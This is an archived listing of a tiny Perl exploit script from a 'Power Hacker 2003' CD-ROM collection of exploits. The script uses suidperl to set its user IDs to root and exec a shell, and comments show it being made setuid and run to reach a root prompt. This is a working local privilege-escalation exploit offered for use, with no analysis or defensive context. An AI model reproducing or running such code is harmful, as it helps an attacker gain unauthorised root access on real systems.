home *** CD-ROM | disk | FTP | other *** search
/ Power Hacker 2003 / Power_Hacker_2003.iso / Exploit and vulnerability / hoobie / perl-ex.sh < prev    next >
Encoding:
Text File  |  2001-11-06  |  110 b   |  11 lines

  1. #!/usr/bin/suidperl -U
  2. $>=0; $<=0;
  3. exec ("/bin/sh");
  4.  
  5.  
  6.  
  7. #   $ chmod 4755 perl-ex.sh
  8. #   $ ./perl-ex.sh
  9. #   #
  10.  
  11.